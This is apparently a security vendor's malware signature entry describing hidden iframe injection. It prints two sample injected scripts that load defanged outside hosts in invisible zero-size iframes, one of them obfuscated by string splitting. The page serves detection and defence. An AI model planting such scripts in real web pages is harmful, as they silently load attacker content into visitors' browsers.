Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.iframe_injection

Description: Suspicious code that injects iframes into a web page.

There are many different ways to write code that injects iframes. For example:

<script type='text/javascript'> function create_frame(url) { var melm = document.​getElementById('partyeverybody28'); if
(typeof(melm) != 'undefined' && melm!= null) {}else{ var iframe = document.createElement('​iframe'); 
iframe.​id = "partyeverybody28"; iframe.style.width = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; 
iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(​iframe); iframe.sr
c = url; return true; } } 
function toyotahondaporsche(​){ create_frame("hxxp://reexjad.servebbs[.]com/"); } 
...
or
document​.write('<iframe src="'+'hx'+'xp://m'+'iss.'+'dic[.]'+'as/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="​0" height="​0" frameborder="0"></iframe>');



Affecting: Any web site (no specific target).

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb